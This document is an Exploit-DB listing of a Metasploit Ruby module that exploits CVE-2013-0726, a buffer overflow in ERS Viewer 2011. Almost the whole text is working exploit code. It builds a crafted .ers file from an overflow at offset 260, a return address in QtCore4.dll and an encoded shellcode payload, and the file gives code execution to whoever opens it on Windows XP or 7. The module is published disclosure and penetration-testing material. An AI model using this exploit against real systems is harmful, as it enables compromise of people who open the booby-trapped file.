ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)

EDB-ID:

25448


Author:

Metasploit

Type:

local


Platform:

Windows

Date:

2013-05-14


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
        (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
        function ERM_convert_to_correct_webpath handles user provided data in a insecure
        way. It results in arbitrary code execution under the context of the user viewing
        a specially crafted .ers file. This module has been tested successfully with ERS
        Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar', # Vulnerability Discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0726' ],
          [ 'OSVDB', '92694' ],
          [ 'BID', '59379' ],
          [ 'URL', 'http://secunia.com/advisories/51725/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 7516,
          'BadChars' => "\x22\x5c" +
            (0x7f..0xff).to_a.pack("C*") +
            (0x00..0x08).to_a.pack("C*") +
            (0x0a..0x1f).to_a.pack("C*"),
          'DisableNops' => true,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ESP'
            }
        },
      'SaveRegisters'  => [ 'ESP' ],
      'DefaultOptions'  =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'ERS Viewer 2011 (v11.04)  / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 260,
              'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 23 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
      ], self.class)

  end

  # Rewrote it because make_nops is ignoring SaveRegisters
  # and corrupting ESP.
  def make_nops(count)
    return "\x43" * count # 0x43 => inc ebx
  end

  def exploit

    buf = rand_text(target['Offset'])
    buf << [target.ret].pack("V")
    buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
    buf << payload.encoded

    ers = %Q|
DatasetHeader Begin
  Name    = "#{buf}"
DatasetHeader End
    |

    file_create(ers)
  end
end